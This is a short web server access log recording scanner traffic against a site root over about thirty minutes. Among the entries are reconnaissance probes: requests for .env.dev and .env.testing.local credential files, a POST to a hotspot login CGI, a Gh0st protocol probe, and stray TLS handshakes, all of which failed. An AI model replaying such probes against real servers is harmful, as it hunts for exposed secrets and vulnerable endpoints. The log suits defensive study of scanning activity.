147.135.23.111 - - [01/Dec/2024:04:46:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
185.191.126.248 - - [01/Dec/2024:04:47:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.133.122 - - [01/Dec/2024:04:49:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.141.120.99 - - [01/Dec/2024:04:50:15 +0100] "POST /cgi-bin/hotspotlogin.cgi HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
89.248.168.227 - - [01/Dec/2024:04:50:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
179.43.133.122 - - [01/Dec/2024:04:51:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
51.81.215.76 - - [01/Dec/2024:04:52:28 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
141.98.11.35 - - [01/Dec/2024:04:52:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
5.196.113.9 - - [01/Dec/2024:04:55:16 +0100] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
5.196.113.12 - - [01/Dec/2024:04:55:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
34.212.132.62 - - [01/Dec/2024:04:59:08 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
34.212.132.62 - - [01/Dec/2024:05:00:12 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
79.137.7.66 - - [01/Dec/2024:05:01:28 +0100] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
79.137.7.72 - - [01/Dec/2024:05:01:29 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
95.214.55.79 - - [01/Dec/2024:05:03:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
123.205.121.86 - - [01/Dec/2024:05:04:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
89.248.168.227 - - [01/Dec/2024:05:08:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
95.214.55.79 - - [01/Dec/2024:05:09:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.133.122 - - [01/Dec/2024:05:09:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.79 - - [01/Dec/2024:05:11:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.68.54.252 - - [01/Dec/2024:05:11:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
66.240.205.34 - - [01/Dec/2024:05:13:56 +0100] "Gh0st\xad" 501 321 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:14:18 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:14:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:14:18 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:14:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:05:14:20 +0100] "GET /.env.dev HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:20 +0100] "GET /.env.testing.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
